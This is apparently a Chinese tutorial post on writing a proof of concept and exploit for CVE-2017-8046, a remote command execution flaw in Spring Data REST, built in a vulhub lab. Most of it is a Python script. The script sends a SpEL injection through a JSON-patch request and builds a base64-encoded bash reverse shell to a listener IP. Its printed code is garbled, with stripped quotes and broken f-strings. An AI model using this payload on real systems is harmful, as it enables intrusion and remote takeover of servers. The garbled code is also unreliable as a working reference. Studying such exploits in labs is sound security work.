CVE-2017-8046 Spring Data Rest 远程命令执行漏洞

本文只要是学习poc、exp的编写，对于漏洞的原理不进行深入的介绍。

环境搭建

cd vulhub-master/spring/CVE-2017-8046
docker-compose up -d

漏洞原理

漏洞的原因是对PATCH方法处理不当，导致攻击者能够利用JSON数据造成RCE。本质还是因为Spring的SPEL解析导致的RCE。

影响版本

Spring Data REST组件的2.6.9 and 3.0.9之前的版本（不包含2.6.9和3.0.9 ） Spring Boot （如果使用了Spring Data REST模块）的1.5.9 和 2.0 M6之前的版本

POC、EXP

import base64
import os
import requests
import json

header = {
          
   
    "Content-Type": "application/json-patch+json"
}
path = "/customers/1"

def poc(url):
    cmd = "touch /tmp/success"
    cmdUnicode = strToAscii(cmd)
    payload=f"{
            
     cmdUnicode}".replace("[", "{").replace("]", "}")

    data=[{
          
   
        "op": "replace",
        "path": f"T(java.lang.Runtime).getRuntime().exec(new java.lang.String(new byte[]{
            
     payload}))/lastname",
        "value": "vulhub"
    }]

    payloadData=json.dumps(data)
    html=requests.patch(url=url+path,headers=header,data=payloadData).text
    number = os.path.basename(__file__).split(.)[0]

    if html.find("EL1010E: Property")>0:
        outPocTrue(number, url, path)
    else:
        outPocFalse(number, url, path)

def exp(url,lhost,lport):
    cmd = bash(lhost,lport)
    cmdUnicode = strToAscii(cmd)
    payload = f"{
            
     cmdUnicode}".replace("[", "{").replace("]", "}")

    data = [{
          
   
        "op": "replace",
        "path": f"T(java.lang.Runtime).getRuntime().exec(new java.lang.String(new byte[]{
            
     payload}))/lastname",
        "value": "vulhub"
    }]

    payloadData = json.dumps(data)
    requests.patch(url=url + path, headers=header, data=payloadData).text

def true_url(url):
    if url[-1] == /:
        url=url[0:-1]

    if url.find("http"):
        url = http:// + url
    return url

def bash(ip,port):
    m = fbash -i >& /dev/tcp/{
            
     ip}/{
            
     port} 0>&1
    s = str(base64.b64encode(m.encode(utf-8)), utf-8)
    bash_code = bash -c {echo, + s + }|{base64,-d}|{bash,-i}
    return bash_code

def strToAscii(code):
    poc=[]
    for i in code:
        poc.append(ord(i))

    return poc

def outPocTrue(number,url,path):
    print(f"[+] The VULN {
            
     number} exists, path is : {
            
     url}{
            
     path}")

def outPocFalse(number,url,path):
    print(f"[-] The VULN {
            
     number} no exists")

    def bash64ToAscii(code):
        poc = ${T(java.lang.Runtime).getRuntime().exec(T(java.lang.Character).toString(%s) % ord(code[0])
        for ch in code[1:]:
            poc += .concat(T(java.lang.Character).toString(%s)) % ord(ch)
        poc += )}

        return poc

url= true_url("192.168.29.129:8080")
ip=192.168.29.135
port=6666

poc(url)
exp(url,ip,port)

运行之后，成功验证了漏洞的存在，并且成功反弹了shell